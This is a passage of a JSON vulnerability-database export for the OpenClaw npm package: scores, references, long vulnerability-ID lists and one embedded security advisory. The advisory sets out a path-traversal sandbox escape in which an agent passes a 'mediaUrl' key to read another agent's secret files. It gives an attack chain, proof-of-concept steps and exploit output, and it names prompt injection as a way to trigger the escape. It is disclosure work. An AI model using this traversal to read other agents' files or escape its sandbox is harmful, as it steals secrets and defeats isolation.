"Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm" }, { "reference_url": "https://github.com/advisories/GHSA-vfg3-pqpq-93m4", "reference_id": "GHSA-vfg3-pqpq-93m4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vfg3-pqpq-93m4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35637", "GHSA-vfg3-pqpq-93m4" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cyj6-zyuh-qug6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91841?format=api", "vulnerability_id": "VCID-d3qp-5wm9-aqfp", "summary": "OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n\n**Description**:\n### Summary\nA path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `[\"media\", \"path\", \"filePath\"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root.\n\n### Details\nThe vulnerability exists in two files within the messaging pipeline:\n\n**1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:**\n\nIn `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate:\n\n```typescript\n// Line 212\nconst mediaKeys: Array<\"media\" | \"path\" | \"filePath\"> = [\"media\", \"path\", \"filePath\"];\n```\n\nThe `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`.\n\n**2. Dropped `mediaLocalRoots` in `handlePluginAction`:**\n\nIn `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context:\n\n```typescript\n// Lines 684-697\nconst handled = await dispatchChannelMessageAction({\n channel,\n action,\n cfg,\n params,\n accountId: accountId ?? undefined,\n requesterSenderId: input.requesterSenderId ?? undefined,\n sessionKey: input.sessionKey,\n sessionId: input.sessionId,\n agentId,\n gateway,\n toolContext: input.toolContext,\n dryRun,\n // mediaLocalRoots is MISSING here\n});\n```\n\nDespite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces.\n\n**Attack chain:**\n1. A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: \"~/.openclaw/workspace/agent-b/secret.txt\" }`\n2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist)\n3. `handlePluginAction` dispatches without `mediaLocalRoots`\n4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**`\n5. Agent-B's secret file content is read and sent as a channel attachment\n\n### PoC\n\n**Prerequisites:**\n- Docker installed\n- OpenClaw Docker image built (`openclaw-gateway:latest`)\n\n**Steps:**\n\n1. Start the vulnerable gateway container:\n\n```bash\ncd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n2. Run the exploit:\n\n```bash\npython3 poc_exploit.py\n```\n\n3. The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully.\n\n4. Run the control experiment to confirm sandbox works for checked keys:\n\n```bash\npython3 control-sandbox_enforced.py\n```\n\n### Log of Evidence\n\n**Exploit output:**\n```\n=== CVE-2026-27522 Variant: Sandbox Media Root Bypass ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running exploit script with Bun...\n\n[VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams!\n Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a\n mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt\n args after normalization: {\"mediaUrl\":\"/root/.openclaw/workspace/agent-b/secret_key.txt\"}\n[EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef\n\n=== EXPLOIT SUCCESSFUL ===\nAgent-A read Agent-B's secret file via mediaUrl, bypassing sandbox.\n\n[+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement\n```\n\n**Control experiment output:**\n```\n=== Control Experiment: Sandbox Enforcement for 'media' Key ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running control script with Bun...\n\n[SAFE] normalizeSandboxMediaParams blocked 'media' key as expected!\n Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt\n\n=== CONTROL EXPERIMENT PASSED ===\nThe 'media' parameter IS correctly checked by sandbox enforcement.\nOnly unchecked keys (mediaUrl, fileUrl) bypass the sandbox.\n\n[+] CONTROL PASSED: 'media' key is correctly enforced by sandbox\n```\n\n### Impact\nThis is a **sandbox escape** vulnerability. An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. This includes:\n- API keys and secrets stored in other agents' sandboxes\n- Session data and conversation logs\n- Configuration files with sensitive credentials\n- Any file within the `~/.openclaw/` directory tree\n\nThis completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14 (current latest)\n- **Patched versions**: <None>\n\n### Severity\n- **Severity**: High\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### Weaknesses\n- **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. |\n| [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. |", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35668", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.17041", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.17002", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.17037", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35668" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35668", "reference_id": "CVE-2026-35668", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35668" }, { "reference_url": "https://github.com/advisories/GHSA-hr5v-j9h9-xjhg", "reference_id": "GHSA-hr5v-j9h9-xjhg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hr5v-j9h9-xjhg" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters", "reference_id": "openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { 